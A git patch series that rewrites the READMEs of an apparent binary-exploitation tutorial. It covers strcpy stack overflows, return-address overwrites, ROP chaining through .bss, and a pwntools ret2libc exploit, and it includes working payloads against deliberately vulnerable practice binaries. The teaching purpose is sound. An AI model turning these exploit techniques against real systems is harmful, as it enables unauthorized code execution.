+**`strcpy()` is a dangerous function!** -So what happens to those extra 12 bytes that don't fit? They just get thrown onto the -stack. +Our buffer only holds 64 bytes, however, the buffer we ask to be copied contains 76 bytes. `strcpy()` doesn't care about checking lengths, so the extra 12 bytes that don't fit just get thrown onto the stack. -The value of `win` was stored right next to our buffer, so next, let's try to -set the value of `win` to `1`. +The value of `win` was stored right next to our buffer, so next let's try to set the value of `win` to `1`. This is where things get a bit tricky... -`"1"`, in string format, is `0x30` in hex. Note the different from integer `1`, which is `0x1` in hex, and isn't printable. +We need to be careful not to confuse characters and integers. The character `1` is `0x30` in hex, but the integer `1` is `0x1` in hex. -Since `win` is right next to our buffer on the stack, we can just submit 64 `A`'s in character format, followed by a single `"\x01"` -to leak into the last byte of `win`, setting `win = 1`. +We want to set `win` equal to the *integer* representation of `1`, not the character representation of `1`. + +Since `win` is right after our buffer on the stack, we can just write 64 `A`'s in character format, followed by a single `"\x01"` to our buffer. This will leak the last byte (`0x01`) of the buffer we wrote to where `win` is stored, setting `win = 1`. ``` $ ./overflow1-3948d17028101c40 $(python -c 'print "A"*64 + "\x01"') @@ -175,5 +166,4 @@ overflow1-3948d17028101c40 overflow1-3948d17028101c40.c README.md $ exit ``` -If you try this for yourself, you'll get a shell. You've now sucessfully -executed a buffer overflow attack! +If you try this for yourself, you'll get a shell. You've now sucessfully executed a buffer overflow attack! From 5ad8ccf14a4861779b0d025ebd0e1c0a2b96c42c Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 02:18:26 -0500 Subject: [PATCH 37/48] Rewrote sections of excercise-1 and added one important backreference in intro-2 --- exercise-1/README.md | 40 +++++++++++++++------------------------- intro-2/README.md | 2 +- 2 files changed, 16 insertions(+), 26 deletions(-) diff --git a/exercise-1/README.md b/exercise-1/README.md index 1a7266c..cfd9d8c 100644 --- a/exercise-1/README.md +++ b/exercise-1/README.md @@ -1,9 +1,9 @@ # The power of SEGFAULT - **Credit to [PicoCTF 2013](2013.picoctf.com) for problem** Consider our file for this exercise [overflow2.c](overflow2.c): + ```C #include #include @@ -28,27 +28,24 @@ int main(int argc, char **argv){ } ``` -Looking at the code for this program, you'll see they used `strcpy()` on our -argument. There are no size checks so we can easily try to overflow onto the -stack like before. You'll notice that there is no way `give_shell()` gets -called. Not yet at least ;) +Looking at the code for this program, you'll see the function `strcpy()` is called with our argument as a parameter. Since there are no size checks on our input, we can try to manipulate the stack just like before. You'll notice that there is no way `give_shell()` gets called. Not yet at least ;) + ``` $ ./overflow2 $(python -c 'print "A"*24') Segmentation fault (core dumped) ``` -Segmentation fault? What's this? Simply put, a segmentation fault simply means -that the program tried to access an address that isn't there. Let's use -`strace` to see what's really happening. +Segmentation fault? What's this? Simply put, a segmentation fault simply means that the program tried to access an address that isn't there. Let's use `strace` to see what's really happening. + ``` $ strace ./overflow2 $(python -c 'print "A"*32') ... ... --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} --- ``` -The address in question is `0x41414141`, or four "A"s. What does this mean? -Consider the disassembly of the function `vuln()`, as well as `main()` where -it's called. + +The address in question is `0x41414141`, or four "A"s. What does this mean? Consider the disassembly of the function `vuln()`, as well as `main()` where it's called. + ``` $ gdb -q ./overflow2 Reading symbols from ./overflow2...(no debugging symbols found)...done. @@ -71,27 +68,20 @@ Dump of assembler code for function vuln: 0x080484fb <+25>: ret End of assembler dump. ``` -So you might remember from [Intro 2](../intro-2) that you can overwrite values -on the stack with a `strcpy()` vulnerability. In the lines of `main()`, -control is passed to the function`vuln()`. However, `vuln()` needs to know where to -come back to in `main()` when it finishes. This is called a return address. In -this case, `vuln()` should jump back to `0x0804851b`, the instruction right after -`main()` calls `vuln()`. When we get a SEGFAULT that we control, that means -that we've overwritten the return address. What can we do with this? The -possibilities are pretty much endless. You have control over the code's flow, -so maybe we can call some other function, namely `give_shell()` + +You might remember from [Intro 2](../intro-2) that you can overwrite values on the stack with a `strcpy()` vulnerability. In the lines of `main()`, control is passed to the function `vuln()`. However, `vuln()` needs to know where to return to in `main()` when it finishes. This is called a return address. In this case, `vuln()` should jump back to `0x0804851b`, the instruction right after `main()` calls `vuln()`. When we get a SEGFAULT that we control, that means that we've overwritten the return address. What can we do with this? The possibilities are pretty much endless. You have control over the code's flow, so maybe we can call some other function, namely `give_shell()`. + ``` $ objdump -d overflow2 | grep give_shell 080484ad : ``` -Now that we have the address of a useful function, let's see if we can supply -*our own* return address. First, as you may remember from the last tutorial, -some of these characters aren't printable. We'll need to convert it to an -escape sequence and reverse the order, leaving us with this: `"\xad\x84\x04\x08"` -Now we can substitute it in! + +Now that we have the address of a useful function, let's see if we can supply *our own* return address. First, as you may remember from the last tutorial, some of these characters aren't printable. We'll need to convert it to an escape sequence and reverse the order, leaving us with this: `"\xad\x84\x04\x08"`. Now we can substitute it in! + ``` $ ./overflow2 $(python -c 'print "A"*28 + "\xad\x84\x04\x08"') $ ls overflow2 overflow2.c README.md ``` + We now have a shell! diff --git a/intro-2/README.md b/intro-2/README.md index de6aa97..767aaf7 100644 --- a/intro-2/README.md +++ b/intro-2/README.md @@ -128,7 +128,7 @@ The value of `win` was stored right next to our buffer, so next let's try to set This is where things get a bit tricky... -We need to be careful not to confuse characters and integers. The character `1` is `0x30` in hex, but the integer `1` is `0x1` in hex. +We need to be careful not to confuse characters and integers. The character `1` is `0x30` in hex, but the integer `1` is `0x1` in hex (Note that this is not printable.) We want to set `win` equal to the *integer* representation of `1`, not the character representation of `1`. From 87a66889f61a59d2eb21996e25f1d09ddedf2153 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 02:24:59 -0500 Subject: [PATCH 38/48] Collapsed paragraphs in README onto one line --- exercise-2/README.md | 40 +++++++++++++++------------------------- 1 file changed, 15 insertions(+), 25 deletions(-) diff --git a/exercise-2/README.md b/exercise-2/README.md index 940068f..3e751cb 100644 --- a/exercise-2/README.md +++ b/exercise-2/README.md @@ -1,8 +1,6 @@ # Build your own `system()` -Well, life is tough. Unlike in the first overflow exercise, I've made this one -so that you can't just call a specific function and get a shell. However, we'll -try to solve it anyways. +Well, life is tough. Unlike in the first overflow exercise, there's no included function that you can call to get a shell. But let's try and get a shell anyways. ```C # include @@ -23,10 +21,10 @@ int main(int argc, char **argv) { } ``` -Now unlike the last problem, you might notice that there is no call to -`system("/bin/sh")`. This means we're going to have to be a bit more clever. +Now unlike the last problem, you might notice that there is no call to `system("/bin/sh")`. This means we're going to have to be a bit more clever. Let's take a look at the disassembly to learn a bit more about `system()` + ``` $ gdb -q ./overflow Reading symbols from ./overflow...(no debugging symbols found)...done. @@ -41,14 +39,9 @@ Dump of assembler code for function main: 0x08048559 <+76>: movl $0x804865e,(%esp) 0x08048560 <+83>: call 0x80483d0 ``` -Now what is `system@plt`? This is a crucial part. This binary is dynamically -linked. This means that the binary makes calls to an actual libc file that gets -put into memory. Luckily for us, dynamically linked binaries have PLT stubs. -Since ASLR randomizes libc addresses as well, the binary needs some way to -reliably call the functions it uses. The PLT is a wrapper function for the -actual code in libc. **The PLT is a part of the binary, it's address doesn't -change.** If you call `system@plt`, you'll call `system()`. So how are we going -to do this? Since the PLT is a part of the binary, we'll use `objdump`. + +Now what is `system@plt`? This is a crucial part. This binary is dynamically linked. This means that the binary makes calls to an actual libc file that gets put into memory. Luckily for us, dynamically linked binaries have PLT stubs. Since ASLR randomizes libc addresses as well, the binary needs some way to reliably call the functions it uses. The PLT is a wrapper function for the actual code in libc. **The PLT is a part of the binary, it's address doesn't change.** If you call `system@plt`, you'll call `system()`. So how are we going to do this? Since the PLT is a part of the binary, we'll use `objdump`. + ``` $ objdump -d overflow | grep system 080483d0 : @@ -56,14 +49,15 @@ $ objdump -d overflow | grep system ``` Now let's try to break the binary. + ``` $ strace ./overflow $(python -c 'print "A"*44') ... --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} --- ``` -We get control of `$eip` after 40 bytes. `$eip` is the instruction pointer -register. This is the same as overwriting a return value. It simply means that -we have control over the control flow. Now let's supply our address. + +We get control of `$eip` after 40 bytes. `$eip` is the instruction pointer register. This is the same as overwriting a return value. It simply means that we have control over the control flow. Now let's supply our address. + ``` ./overflow $(python -c 'print "A"*40 + "\xd0\x83\x04\x08"') Good thing you don't have /bin/sh @@ -72,16 +66,12 @@ You Lose! sh: 1: ������: not found Segmentation fault (core dumped) ``` -Now this is really weird. What happened here is that we called `system()`. -We didn't provide any arguments for `system()` so it just pulled some junk from -the stack. Calling a function in an exploit has to take this form: + +Now this is really weird. What happened here is that we called `system()`. We didn't provide any arguments for `system()` so it just pulled some junk from the stack. Calling a function in an exploit has to take this form: \[address of function\] \[return address\] \[argument\] -Now when the programmer wrote this, (I wrote this one :P) he thought he could -be smart and make fun of you for not having a `"/bin/sh"` string. However, he -didn't realize that by including that string in the code, the string is in the -binary. We can use `gdb` to find the string! +Now when the programmer wrote this, (I wrote this one :P) he thought he could be smart and make fun of you for not having a `"/bin/sh"` string. However, he didn't realize that by including that string in the code, the string is in the binary. We can use `gdb` to find the string! ``` $ gdb -q ./overflow @@ -98,8 +88,8 @@ overflow : 0x804963a ("/bin/sh") libc : 0xf7f82a24 ("/bin/sh") ``` -Now you'll notice that two of these are in the binary. I'll just pick the first -one and run with it. Finally, our finished exploit looks like so: +Now you'll notice that two of these are in the binary. I'll just pick the first one and run with it. Finally, our finished exploit looks like so: + ``` ./overflow $(python -c 'print "A"*40 + "\xd0\x83\x04\x08" + "FAKE" + "\x3a\x86\x04\x08"') From c7fdbfbf55b9651cb74a58b7263b7b7dbcea803f Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 02:28:44 -0500 Subject: [PATCH 39/48] Removed peda-session-date.txt and peda-session-overflow.txt --- exercise-3/peda-session-date.txt | 3 --- exercise-3/peda-session-overflow.txt | 2 -- 2 files changed, 5 deletions(-) delete mode 100644 exercise-3/peda-session-date.txt delete mode 100644 exercise-3/peda-session-overflow.txt diff --git a/exercise-3/peda-session-date.txt b/exercise-3/peda-session-date.txt deleted file mode 100644 index 5290d54..0000000 --- a/exercise-3/peda-session-date.txt +++ /dev/null @@ -1,3 +0,0 @@ -break *main -disable - diff --git a/exercise-3/peda-session-overflow.txt b/exercise-3/peda-session-overflow.txt deleted file mode 100644 index 427566f..0000000 --- a/exercise-3/peda-session-overflow.txt +++ /dev/null @@ -1,2 +0,0 @@ -break *main - From 28dc875bd2cd6b47e66594762734ef58592a6b0e Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 02:44:38 -0500 Subject: [PATCH 40/48] Rewriting sections of excercise-3 --- exercise-3/README.md | 70 +++++++++++++++++--------------------------- 1 file changed, 27 insertions(+), 43 deletions(-) diff --git a/exercise-3/README.md b/exercise-3/README.md index 9fe8051..5d85810 100644 --- a/exercise-3/README.md +++ b/exercise-3/README.md @@ -28,33 +28,23 @@ int main(int argc, char **argv) { } ``` -As you'll remember from the previous exercise, putting `"/bin/sh"` in the binary -was a mistake. This problem is geared very similarly with a little bit of extra -finesse. First things first, we'll find the offset of `%eip` +As you'll remember from the previous exercise, putting `"/bin/sh"` in the binary was a mistake. This problem is geared very similarly with a little bit of extra finesse. First things first, we'll find the offset of `%eip` -``` +```gdb $ strace ./overflow $(python -c 'print "A"*76 + "BBBB"') ... --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} --- ``` -After 76 bytes we have `%eip`! From here we have to get a bit clever. If you -take anything from this exercise, it's this: **If it's in the binary without -PIE enabled, you have access to it.** This gives us access to the `strcat()` -and `strcpy()` functions. We can use these to cleverly get ourselves a shell. +After 76 bytes we have `%eip`! From here we have to get a bit clever. If you take anything from this exercise, it's this: **If a function is in the binary an PIE is not enabled, you have access to the function.** This means we can access to the `strcat()` and `strcpy()` functions. We can use these to cleverly get ourselves a shell. -Now, for a quick introduction to the `.bss` segment. It is a part of the binary -used by linkers and compilers to initialize some variables (I think?). -Regardless of what the program uses the `.bss` for, just know that it's a -scratch pad for hackers. We can use it to reliably store data when the stack is -randomized. We could use the GOT, but it might mess up functions we need. -Knowing this, how can we get a shell? +Now, for a quick introduction to the `.bss` segment. `.bss` refers to the part of data memory used by many compilers and linkers for holding statically-allocated variables that are not explicitly initialized to any value. Regardless of what the program uses the `.bss` segment for, know that it's a scratch pad for hackers. We can use it to reliably store data when the stack is randomized. We could use the GOT, but it might mess up functions we need. Knowing this, how can we get a shell? -The answer lies in the functions used. We have the strings `"/b"` and `"in/"` in -the binary. We also have `"sh"` at the end of the second print statement! :D +The answer lies in the functions used. We have the strings `"/b"` and `"in/"` in the binary. We also have `"sh"` at the end of the second print statement! :D Let's use `objdump` to get some function addresses: -``` + +```objdump $ objdump -d overflow | grep ">:" ... 08048370 : @@ -63,9 +53,9 @@ $ objdump -d overflow | grep ">:" 080483a0 : ``` -Next we will need to find the start of the `.bss` segment +Next, we will need to find the start of the `.bss` segment: -``` +```gdb $ gdb -q ./overflow Reading symbols from ./overflow...(no debugging symbols found)...done. gdb-peda$ info address __bss_start @@ -74,12 +64,16 @@ Symbol "__bss_start" is at 0x804a030 in a file compiled without debugging. Now our exploit (abstractly) is as follows: -``` -strcpy(&bss, &"/b" );strcat(&bss, &"in/");strcat(&bss,&"sh");system(&bss) +```c +strcpy(&bss, &"/b" ); +strcat(&bss, &"in/"); +strcat(&bss,&"sh"); +system(&bss) ``` We'll need the addresses of strings in the binary: -``` + +```gdb $ gdb -q ./overflow Reading symbols from ./overflow...(no debugging symbols found)...done. gdb-peda$ b*main @@ -104,26 +98,19 @@ overflow : 0x80486ce --> 0x75006873 ('sh') overflow : 0x80496ce --> 0x75006873 ('sh') ``` -Now with these we can learn one more important concept: Chaining Functions. -In order to chain functions together we need to somehow remove the arguments -off of the stack. As you know from before, standard x86 function calls look -like: +Now that we have everything we need, we can learn one more important concept: Chaining Functions. If you only need to call one function to get a shell, you don't need to chain. Otherwise, we need to chain functions. + +In order to chain functions together we need to somehow remove the arguments from the stack. As you know from before, standard x86 function calls look like: \[function address\] \[return address\] \[arg1\] \[arg2\] ... -If you only need to call one function to get a shell, you don't need to chain. -The first function will run, then the return address, then the program -will SEGFAULT when it tried to run the argument as code. We can't have the -program trying to run our arguments, so we need to pop them off of the stack. +The first function will run, then the return address, then the program will SEGFAULT when it tries to run the argument as code. We can't have the program trying to run our arguments, so we need to pop them off of the stack. -This requires our first ROPgadget. A ROPgadget is defined as being any set of -instructions in a binary that ends with a ret instruction. In order to find these, you can use -ropshell.com , gdb-peda, or ROPgadget. We need a pop;pop;ret gadget since we -need to pop two arguments off of the stack for every function call except -system. Since system is our last call, we don't need a pop ret gadget for it. +This requires the use of Return Oriented Programming, or a ROP exploit. ROP uses any set of instructions in a binary that ends with a `ret` instruction. In order to find these, you can use `ropshell.com`, `gdb-peda`, or `ROPgadget`. We need a `pop;pop;ret` gadget since we need to pop two arguments off of the stack for every function call except system. Since system is our last call, we don't need a `pop;ret` gadget for it. -I'll use gdb-peda -``` +I'm using `gdb-peda` in this example. + +```gdb $ gdb -q ./overflow Reading symbols from ./overflow...(no debugging symbols found)...done. gdb-peda$ b*main @@ -139,16 +126,14 @@ Searching for ROP gadget: '' in: binary ranges ``` Luckily for us, the binary has the gadget we need! Chaining functions will take -this form in our exploit (and future ones for that matter!) +this form in our exploit (and future ones, too!) \[&function\] \[&rop_gadget\] \[&arg1\] \[&arg2\] \[&next_function\] -You can use any amount of arguments as long as you have a rop gadget with -equally as many pops +You can use any number of arguments as long as you have a rop gadget with the same number of pops. Let's give the exploit a try: - ``` /overflow $(python -c 'print "A"*76 + "\x80\x83\x04\x08" + "\x3e\x86\x04\x08" + "\x30\xa0\x04\x08" + @@ -158,5 +143,4 @@ Let's give the exploit a try: "\xa0\x83\x04\x08" + "FAKE" + "\x30\xa0\x04\x08"') ``` -You should get a shell (Although it might be a weird one and not let you do -anything. I forgot to set privs :/ The concept still stands :P) +You should get a shell, although you won't be able to do much as we didn't set privs. The concept, however, still stands. From fc3dacf23b1728f313168704e7055295f20902dc Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 03:00:09 -0500 Subject: [PATCH 41/48] pwntools example rewrite and fixed incorrect information --- exercise-3.5/README.md | 56 +++++++++++++++++------------------------- 1 file changed, 23 insertions(+), 33 deletions(-) diff --git a/exercise-3.5/README.md b/exercise-3.5/README.md index b4f13d4..d06e561 100644 --- a/exercise-3.5/README.md +++ b/exercise-3.5/README.md @@ -1,72 +1,62 @@ -# pwntools +# pwntools Overview -## Attention: This is just an overview. - -## RTFM: https://pwntools.readthedocs.io +**Documentation: https://pwntools.readthedocs.io** First things first: -``` + +```python from pwn import * ``` That's just a generic import statement. -``` +```python context(arch='i386', os='linux') ``` -this just sets the context for other functions that we'll describe later. +This just sets the context for other functions that we'll describe later. -``` +```python binary = ELF("some_challenge") libc = ELF("some_libc") ``` -This part adds two ELF objects, binary and libc. ELF objects are supremely -useful; they give you access to a wide array of methods and data fields. -I almost always have both of these lines in my script, even if the libc one is -commented out. +This part adds two ELF objects, binary and libc. ELF objects are supremely useful -- they give you access to a wide array of methods and data fields. I almost always have both of these lines in my script, even if the libc one is commented out. -``` -r=process("./some_challenge") +```python +r = process("./some_challenge") ``` This simply executes the challenge (in the same directory.) Alternatively: -``` -r=remote("127.0.0.1",1337) #<-- Replace with actual HOST,PORT + +```python +r = remote("127.0.0.1",1337) #<-- Replace with actual HOST,PORT ``` will run it remotely (many CTFs will not give you a full shell, just a host and -a port to connect to the binary) +a port to connect to the binary.) -Now many of you will remember taking adresses and turning them into python +Many of you will remember taking adresses and turning them into python escape sequences by hand. -``` -say for example the address of write() in a binary is 0xdeadbeef -\xef\xbe\xed\xda -``` +If the address of the `write()` function is `0xdeadbeef`, the escaped address for `write()` would be `\xef\xbe\xad\xde`. -would be the resulting python escape. However, `pwntools` can take care of this. +`pwntools` can take care of this for us! -``` +```python write = p32(binary.symbols["write"]) ``` -this "packs" (converts to the escape seqence, sort of) the address of write for -us on a 32 bit machine. `p64()` also exists, for 64 bit machines. - +This "packs" (converts to the escape seqence, sort of) the address of `write()` for us on a 32 bit machine. `p64()` also exists, for 64 bit machines. Another thing to be cognizant of is the difference between Big and Little Endian memory encoding. Make sure you know what format the system you're writing an exploit for is using. -Assuming 'r' is an instantiated process or remote, you can now use these -methods to communicate with the binary +Assuming `r` is an instantiated process or remote, you can now use these methods to communicate with the binary. -``` +```python r.sendline("This sends a string with a newline appended to the end") r.send("This also sends a string") ``` -Now me telling you all of this is kind of useless without you getting real -experience. **At this point I would strongly recommend solving the first 3 -challenges using pwntools.** +Reading this information is one thing. Getting real experience is another. +**At this point I would strongly recommend solving the first 3 challenges using pwntools.** From 7c77e123d4ee24d916832de4576f3b2270f2dfa9 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 03:16:24 -0500 Subject: [PATCH 42/48] Rewrote excercise-4/README --- exercise-4/README.md | 121 ++++++++++++++++--------------------------- 1 file changed, 44 insertions(+), 77 deletions(-) diff --git a/exercise-4/README.md b/exercise-4/README.md index 87d0013..2530939 100644 --- a/exercise-4/README.md +++ b/exercise-4/README.md @@ -1,60 +1,38 @@ -# Pay a visit to your Local Library +# Pay your local library a visit -At this point you're probably used to hunting through binaries for useful -functions or code that you can use to get a shell. But what do you do without a -call to `system()`? +At this point you're probably used to hunting through binaries for useful functions or code that you can use to get a shell. But what do you do without a call to `system()`? The simple answer: get a shell anyways. :) -The long answer is a bit more complicated. This attack is called a return to -`libc`, or `ret2libc` for short. If you don't remember the PLT and GOT from before, -now is a good time to check the [glossary](../terms) and maybe do some -googling. You'll recall that ASLR randomizes the libc address, but the good -news is that with arbitrary `read()` and `write()` you can easily circumvent -this. +The long answer is a bit more complicated. This attack is called a "Return to `libc`", or `ret2libc` for short. If you don't remember the PLT and GOT from before, now is a good time to check the [glossary](../terms) and maybe do some googling. You'll recall that ASLR randomizes the libc address, but the good news is that with arbitrary `read()` and `write()` calls, you can easily circumvent this. -This binary has what we call Dynamic Input, which is some super fancy -ego-inflating jargon that means we can change inputs in the same program. -Basically any program where you can trigger the vulnerability twice (or more) with -different exploits in the same run is dynamic. If it still doesn't make sense, -just stay tuned. +This binary has what we call Dynamic Input, which is some super fancy ego-inflating jargon that means we can change inputs in the same program. Basically any program where you can trigger the vulnerability twice (or more) with different exploits in the same run is dynamic. If it still doesn't make sense, just stay tuned. If you haven't already, run through [Exercise 3.5: Intro to pwntools](../exercise-3.5) Seriously, go do that. -Now that you've made it this far, I'll give a brief overview of this style of -exploit. The libc functions that the PLT stubs call aren't just some magical -ethereal functions. They're real and they're mapped to a real page in memory -with an address that you can call if you're clever. **The entire libc is in -the binary.** From here, we exploit the fact that truly randomizing everything -is computationally expensive. Instead, ASLR only randomizes the **base -address** of the libc. This means that &function_1 - &function_2 is constant as -long as you're using the same libc file. With this in mind, the goal is to leak -(`write()`) the address of some libc function to stdout. we then take that -address, compute the address of system, call `main()` (or whatever function -contains the vulnerability) again, and call `system()` with the newly computed -address. +Now that you've made it this far, I'll give a brief overview of this style of exploit. The libc functions that the PLT stubs call aren't just some magical ethereal functions. They're real and they're mapped to a real page in memory with an address that you can call if you're clever. **The entire libc is in the binary.** From here, we exploit the fact that truly randomizing everything is computationally expensive. Instead, ASLR only randomizes the **base address** of the libc. This means that `&function_1 - &function_2` is constant as long as you're using the same libc file. With this in mind, the goal is to leak (`write()`) the address of some libc function to stdout. we then take that address, compute the address of system, call `main()` (or whatever function contains the vulnerability) again, and call `system()` with the newly computed address. Still confused? I was when I first learned this, but I'll try to explain as I go. First, we have to calculate the offset of `%eip` -``` + +```shell $ python -c 'print "A"*140 + "BBBB"' | strace ./exercise-4 ... --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} --- ``` -After 140 bytes, we have `%eip` +After `140 bytes`, we have `%eip` From here, we need to leak the address of a `libc` function. -We can do this by calling `write(1,&function,4)` +We can do this by calling `write(1, &function, 4)` -I'll be using the GOT address of `read()` (remember that the GOT is an array of -pointers into libc) +I'll be using the GOT address of `read()` (remember that the GOT is an array of pointers into libc) -``` +```objdump $ objdump -d exercise-4 | grep ">:a" ... 08048370 : @@ -68,37 +46,35 @@ $ objdump -R exercise-4 With these addresses, we get the following exploit. -``` +```shell python -c 'print "A"*140 + "\x70\x83\x04\x08" + "RETN" + "\x01\x00\x00\x00"+ "\x0c\xa0\x04\x08" + "\x04\x00\x00\x00"' | ./exercise-4 ``` If you go ahead and run this a few times, you'll get some weird outputs: -``` + +```shell �+o�Segmentation fault (core dumped) �kh�Segmentation fault (core dumped) ��n�Segmentation fault (core dumped) ``` -The four bytes before the SEGFAULT are the libc address. Now this is why we -need pwntools. +The four bytes before the SEGFAULT are the libc address. From here, we're going to run: -``` + +```shell $ ldd exercise-4 linux-gate.so.1 => (0xf76f9000) libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf753c000) /lib/ld-linux.so.2 (0xf76fa000) ``` -Since this is a local binary challenge, the `libc` file is just going to be -whatever the standard one is on your computer. **The same binary running on a -different machine could have a different `libc`, and therefore give you different results.** +Since this is a local binary challenge, the `libc` file is just going to be whatever the standard one is on your computer. **The same binary running on a different machine could have a different `libc`, and therefore give you different results.** -All we have to do is grab a copy of that `libc` and put it in our directory -If you ever exploit a remote binary and you don't have the `libc`, there are -plenty of places you can get them online. -``` +All we have to do is grab a copy of that `libc` and put it in our directory. If you ever exploit a remote binary and you don't have the `libc`, there are plenty of places you can get them online. + +```shell $ cp /lib/i386-linux-gnu/libc.so.6 ./ ``` @@ -112,13 +88,12 @@ context(arch='i386', os='linux') # <-- Add the architecture and os binary = ELF("exercise-4") libc = ELF("libc.so.6") -r=process("./exercise-4") +r = process("./exercise-4") ``` -after this, we know we'll need the `read()`,`write()`, the GOT address of -`read()`, and a `pop ; ret` ropgadget, so we add these in. +After this, we know we'll need the `read()`, `write()`, the GOT address of `read()`, and a `pop; ret` ropgadget, so we add these in. -```Pyton +```python write_plt = p32(binary.symbols["write"]) read_GOT = p32(binary.symbols["got.read"]) read_plt = p32(binary.symbols["read"]) @@ -126,19 +101,15 @@ bss_addr = p32(binary.symbols["__bss_start"]) pop_ret = "\x9d\x85\x04\x08" ``` -Now the binary outputs a line first, so we add +Now the binary outputs a line first, so we add: -```Python +```python r.recvline() ``` -Now we should start building our exploit. We want to try to avoid using the -escape strings from before, it makes for nicer code and forces you to use -`pwntools` the right way. - -So, we add: +Now we should start building our exploit. We want to try to avoid using the escape strings from before, it makes for nicer code and forces you to use `pwntools` the right way. -```Python +```python exploit = "A"*140 # EIP offset exploit += write_plt +pop_ret + p32(1)+ read_GOT + p32(4) # Call to write() exploit += p32(binary.symbols["main"]) # Call main() again to retrigger the vulnerability @@ -147,42 +118,38 @@ exploit += p32(binary.symbols["main"]) # Call main() ag Now we want to send the first payload: -```Python +```python r.sendline(exploit) ``` -Now here's the cool part. Since we know that the program prints out the address -of `read()` in the `libc` (remember those funky bytes from earlier before the -SEGFAULT?) we can take those and calculate the base address of `libc`. This -indirectly means that we can call any function in the standard library. +Now here's the cool part. Since we know that the program prints out the address of `read()` in the `libc` (remember those funky bytes from earlier before the SEGFAULT?) we can take those and calculate the base address of `libc`. This indirectly means that we can call any function in the standard library. -``` +```python addr_read = int(r.recv(4)[::-1].encode("hex"),16) r.recvline() libc_base = addr_read - libc.symbols["read"] system = p32(libc_base + libc.symbols["system"]) ``` -For those unfamiliar with my hacky `addr_read` line, here's what it does. -First, it `recv()`'s 4 bytes. Then, it reverses them (remember the little -endian). Then it takes them and converts them to hex, and parses that as an -integer. Voila, we have the address of `read()` in the libc. From there, we -subtract `read()`s address in the regular libc, giving us the base address for -this runtime. In the last line, we add the offset of `system()` in the libc to -our calculated base. This gives us the address of system for this runtime. +Let's break down my hacky `addr_read` line. -The best part of this whole show is that the pesky `"/bin/sh"` string we seem to -keep needing is in the `libc`! We can calculate the address of that as well! +1. `recv()` 4 bytes from `r` +2. Reverses the remaining bytes (because of little endian encoding) and converts them to hex +3. Parse that as an integer. -``` +Voila! We now have the address of `read()` in `libc`. + +From there, we subtract `read()`s address in the regular libc, giving us the base address for this runtime. In the last line, we add the offset of `system()` in the libc to our calculated base. This gives us the address of system for this runtime. + +The best part of this whole show is that the pesky `"/bin/sh"` string we need is in `libc`! We can calculate the address of that as well! + +```python binsh = p32(libc_base + libc.search("/bin/sh").next()) ``` -Now all we've got to do is send our exploit with some extra padding (it was 140 -before, but now it's 148 since we overflow from before the stack frame) and we -get a shell. +Now all we've got to do is send our exploit with some extra padding (it was 140 before, but now it's 148 since we overflow from before the stack frame) and we get a shell. -``` +```python r.sendline("A"*148+ system + "RETN" + binsh + binsh) # <- 148?????? why 148? r.interactive() ``` From 1babe530ceb28060e7f23df24f82dcc7124ea3f9 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 03:18:55 -0500 Subject: [PATCH 43/48] Code formatting and paragraph formatting for intro-1/README --- intro-1/README.md | 45 +++++++++++++++------------------------------ 1 file changed, 15 insertions(+), 30 deletions(-) diff --git a/intro-1/README.md b/intro-1/README.md index d2ecbe6..775a7ac 100644 --- a/intro-1/README.md +++ b/intro-1/README.md @@ -1,8 +1,6 @@ # Intro 1: What is a binary, really? -In short, a binary is the output file that the computer can actually run when you -compile high level code, such as C or C++. I believe in hands on learning, so -we can take a look inside one to really find out. +In short, a binary is the output file that the computer can actually run when you compile high level code, such as C or C++. I believe in hands on learning, so we can take a look inside one to really find out. Consider the file [hello_world.c](hello_world.c): ```C @@ -12,28 +10,24 @@ int main() { } ``` -This is your average C file, more or less. It's got a main function, some -includes, and a little bit of code to be run. However, your computer can't -actually run it. In order to make it usable, we must compile it: +This is your average C file, more or less. It's got a main function, some includes, and a little bit of code to be run. However, your computer can't actually run it. In order to make it usable, we must compile it: -``` +```shell $ gcc -m32 hello_world.c -o hello_world.bin ``` -You can ignore the `-m32` argument (we'll talk about it later), but the -`-o hello_world.bin` simply specifies what the name of the output file -is going to be. +You can ignore the `-m32` argument (we'll talk about it later), but the `-o hello_world.bin` simply specifies what the name of the output file is going to be. From here, we can execute it: -``` + +```shell $ ./hello_world.bin Hello World! ``` -Unsurprisingly, we get "Hello World!" as the output. But let's go a bit deeper. -We can open `gdb (GNU Debugger)` and see what's happening under the hood: +Unsurprisingly, we get `"Hello World!"` as output. But let's go a bit deeper. We can open `gdb (GNU Debugger)` and see what's happening under the hood: -``` +```gdb $ gdb -q ./hello_world.bin Reading symbols from ./hello_world.bin...(no debugging symbols found)...done. gdb-peda$ disas main @@ -52,36 +46,27 @@ gdb-peda$ quit Your prompt probably looks like `(gdb)`, whereas mine is `gdb-peda$`. Don't worry about this, my gdb is modified. -The weird code that `gdb` displayed is called assembly language. It's the lowest -level human readable code out there. Each line maps directly to a machine instruction. -Let's break this down. +The weird code that `gdb` displayed is called assembly language. It's the lowest level human readable code out there. Each line maps directly to a machine instruction. Let's break this down. -``` +```asm 0x0804841d <+0>: push %ebp 0x0804841e <+1>: mov %esp,%ebp 0x08048420 <+3>: and $0xfffffff0,%esp 0x08048423 <+6>: sub $0x10,%esp ``` -The numbers you see on the left are addresses. You can think of these just like your house -address: `0x0804841d` is where the instruction `push %ebp` lives. These -first four instructions are just conventions for a function, in this case `main()`. +The hex numbers you see on the left are addresses. You can think of these just like your house address: `0x0804841d` is where the instruction `push %ebp` lives. These first four instructions are just conventions for a function, in this case `main()`. -``` +```asm 0x08048426 <+9>: movl $0x80484d0,(%esp) 0x0804842d <+16>: call 0x80482f0 ``` -These instructions are what actually print out "Hello World!". The program -moves 